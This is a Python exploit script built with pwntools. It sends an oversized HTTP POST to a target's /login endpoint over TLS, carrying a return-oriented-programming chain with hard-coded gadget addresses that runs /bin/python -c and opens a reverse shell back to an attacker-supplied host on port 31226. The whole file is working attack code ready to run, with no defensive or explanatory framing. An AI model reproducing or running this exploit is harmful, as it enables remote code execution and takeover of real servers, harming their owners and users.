import ssl from pwn import * context = ssl.SSLContext() target_host = sys.argv[1] target_port = sys.argv[2] reverse = sys.argv[3] params = sys.argv[4].split(" ") strparams = "[" for param in params: strparams += "'" + param + "'," strparams = strparams[:-1] strparams += "]" # binary functions RCE execve = p64(0x0042e050) ENGINE_ctrl = p64(0x009FE0) EVP_CIPHER_flags = p64(0x22b01a0) # binary gadgets 栈迁移 movrdirax = p64(0x00000000019d2196) # : mov rdi, rax ; call r13 poprsi = p64(0x000000000042f0f8) # : pop rsi ; ret) poprdx = p64(0x000000000042f4a5) # : pop rdx ; ret) jmprax = p64(0x0000000000433181) #: jmp rax) pops = p64(0x000000000165cfd7) # : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret) poprax = p64(0x00000000004359af) # : pop rax ; ret) gadget1 = p64( 0x0000000001697e0d) # 0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret poprdi = p64(0x000000000042ed7e) # : pop rdi ; ret rax3 = gadget1 ropchain = poprax ropchain += execve ropchain += poprdi ropchain += poprsi ropchain += poprdx ropchain += jmprax ropchain += b"/bin/python\x00\x00\x00\x00\x00" ropchain += b"python\x00\x00" ropchain += b"-c\x00\x00\x00\x00\x00\x00" ropchain += b"""import socket,sys,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('""" + reverse.encode() + b"""',31226))\n[os.dup2(s.fileno(),x) for x in range(3)]\ni=os.fork()\nif i==0:\n os.execve('/bin/sh', """ + strparams.encode() + b""",{})\n\x00\x00""" try: with socket.create_connection((target_host, int(target_port, 10))) as sock: with context.wrap_socket(sock, server_hostname=target_host) as ssock: ssock.settimeout(2) context.verify_mode = ssl.CERT_NONE payload = EVP_CIPHER_flags + ENGINE_ctrl + poprdi + pops + b"A" * 40 + pops + rax3 + ropchain tosend = b"POST /login HTTP/1.1\r\nHost: " + target_host + b"\r\nContent-Length: 4303491072\r\n\r\n" + payload ssock.sendall(tosend) r = ssock.recv(10024) except Exception as e: print("Exception occurred :" + repr(e))